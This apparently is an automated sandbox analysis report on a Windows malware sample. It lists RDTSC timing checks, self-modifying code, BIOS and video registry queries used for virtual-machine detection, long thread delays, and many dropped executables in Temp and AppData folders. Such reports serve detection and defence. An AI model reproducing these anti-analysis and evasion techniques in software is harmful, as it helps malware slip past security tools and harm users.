Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D01B0 second address: 53D01D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F07E8CE6A8Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D01D8 second address: 53D01DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D01DE second address: 53D01E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D01E2 second address: 53D01E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5430D6A second address: 5430D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5430D6E second address: 5430D74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5430D74 second address: 5430D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5430D7A second address: 5430D7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5430D7E second address: 5430DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F07E8CE6A8Dh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F07E8CE6A8Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5430DA4 second address: 5430DEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F07E8D7A967h 0x00000008 pop esi 0x00000009 jmp 00007F07E8D7A969h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F07E8D7A95Dh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5430DEC second address: 5430DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5430DF2 second address: 5430DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E058B second address: 53E059D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8CE6A8Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E059D second address: 53E05C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A95Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F07E8D7A960h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E05C3 second address: 53E05D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E05D2 second address: 53E063D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F07E8D7A961h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F07E8D7A95Eh 0x00000015 mov ebp, esp 0x00000017 jmp 00007F07E8D7A960h 0x0000001c push FFFFFFFEh 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F07E8D7A967h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E063D second address: 53E0655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8CE6A94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E0655 second address: 53E0659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E0659 second address: 53E071C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 34FDF67Eh 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F07E8CE6A8Ah 0x00000014 and cx, B6D8h 0x00000019 jmp 00007F07E8CE6A8Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F07E8CE6A98h 0x00000025 add eax, 70888138h 0x0000002b jmp 00007F07E8CE6A8Bh 0x00000030 popfd 0x00000031 popad 0x00000032 xor dword ptr [esp], 42043666h 0x00000039 jmp 00007F07E8CE6A96h 0x0000003e push 2443DF7Bh 0x00000043 jmp 00007F07E8CE6A91h 0x00000048 xor dword ptr [esp], 52B3717Bh 0x0000004f jmp 00007F07E8CE6A8Eh 0x00000054 mov eax, dword ptr fs:[00000000h] 0x0000005a jmp 00007F07E8CE6A90h 0x0000005f nop 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F07E8CE6A8Ah 0x00000069 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E071C second address: 53E0722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E0722 second address: 53E0733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8CE6A8Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E0733 second address: 53E07C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F07E8D7A967h 0x00000013 and ah, 0000007Eh 0x00000016 jmp 00007F07E8D7A969h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F07E8D7A960h 0x00000022 adc si, AF78h 0x00000027 jmp 00007F07E8D7A95Bh 0x0000002c popfd 0x0000002d popad 0x0000002e nop 0x0000002f jmp 00007F07E8D7A966h 0x00000034 sub esp, 1Ch 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E07C4 second address: 53E07C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E07C8 second address: 53E07CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E07CC second address: 53E07D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E07D2 second address: 53E07E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8D7A95Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E07E1 second address: 53E07E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E07E5 second address: 53E081C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F07E8D7A962h 0x0000000e mov dword ptr [esp], ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F07E8D7A967h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E081C second address: 53E0822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E0822 second address: 53E0860 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A95Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d mov eax, 3A21C85Bh 0x00000012 mov eax, 412A8F37h 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a mov ch, bh 0x0000001c push eax 0x0000001d movsx ebx, ax 0x00000020 pop esi 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 pushad 0x00000024 mov di, 1C6Ch 0x00000028 mov ebx, 121B9358h 0x0000002d popad 0x0000002e push ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov si, di 0x00000035 mov bl, 82h 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E0860 second address: 53E0895 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F07E8CE6A95h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E0895 second address: 53E08BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76FBB370h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F07E8D7A95Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E08BE second address: 53E08FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 0Bh 0x00000005 call 00007F07E8CE6A98h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [ebp-08h], eax 0x00000011 jmp 00007F07E8CE6A91h 0x00000016 xor eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push esi 0x0000001c pop edx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E08FB second address: 53E0916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8D7A967h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E0916 second address: 53E091A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E091A second address: 53E099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F07E8D7A960h 0x00000010 xor al, FFFFFFC8h 0x00000013 jmp 00007F07E8D7A95Bh 0x00000018 popfd 0x00000019 mov bx, cx 0x0000001c popad 0x0000001d mov dword ptr [esp], eax 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F07E8D7A960h 0x00000027 or ecx, 3BA8A328h 0x0000002d jmp 00007F07E8D7A95Bh 0x00000032 popfd 0x00000033 pushad 0x00000034 mov esi, 66585935h 0x00000039 call 00007F07E8D7A962h 0x0000003e pop eax 0x0000003f popad 0x00000040 popad 0x00000041 lea eax, dword ptr [ebp-10h] 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F07E8D7A95Ch 0x0000004b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E099B second address: 53E09A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Special instruction interceptor: First address: A8E934 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Special instruction interceptor: First address: A8E9FB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 67E934 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 67E9FB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Special instruction interceptor: First address: 469730 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Special instruction interceptor: First address: 611809 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe	Special instruction interceptor: First address: 63EEFF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Special instruction interceptor: First address: 1FAB40 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Special instruction interceptor: First address: 1FAA28 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Special instruction interceptor: First address: 3AB31F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Special instruction interceptor: First address: 3D28C3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Special instruction interceptor: First address: 3B5B32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Special instruction interceptor: First address: 4313D6 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Memory allocated: 14D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Memory allocated: 2F10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Memory allocated: 14D0000 memory reserve \| memory write watch
Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 2520000 memory reserve \| memory write watch
Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 1A840000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Memory allocated: F80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Memory allocated: 2AE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Memory allocated: 28F0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\2E02vIiMfd.exe

Code function: 0_2_05430DBE rdtsc

0_2_05430DBE

Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1053	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1102	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1091	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1100	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1037	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1130	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Window / User API: threadDelayed 4173
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe	Window / User API: threadDelayed 9882
Source: C:\Windows\System32\regsvr32.exe	Window / User API: threadDelayed 8273
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4419

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\is-M557G.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-5UJKF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-6A03S.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-2F1P8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5PrintSupport.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-USEQS.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-71B95.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-INB8V.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-708D0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Dropped PE file which has not been started: C:\ProgramData\p89hl\0r1n7q	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IV43K.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuin51.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuuc51.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1053885001\fb2bfd0ee0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IV43K.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\is-3MHQO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-JGBL8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-A6A5H.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libGLESv2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcr100.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\uxtheme_2.drv (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-INB8V.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IV43K.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-0VVQ0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1053886001\8d05ec9382.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcp100.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1053887001\cf666bd85d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-USEQS.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-Q865F.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-USEQS.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-8VEV4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5Concurrent.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-INB8V.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libEGL.dll (copy)	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

API coverage: 3.9 %

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4928	Thread sleep count: 1053 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4928	Thread sleep time: -2107053s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4480	Thread sleep count: 1102 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4480	Thread sleep time: -2205102s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5788	Thread sleep count: 1091 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5788	Thread sleep time: -2183091s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3128	Thread sleep count: 1100 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3128	Thread sleep time: -2201100s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2720	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4268	Thread sleep count: 241 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4268	Thread sleep time: -7230000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3288	Thread sleep count: 1037 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3288	Thread sleep time: -2075037s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7020	Thread sleep count: 1130 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7020	Thread sleep time: -2261130s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe TID: 6700	Thread sleep time: -180000s >= -30000s
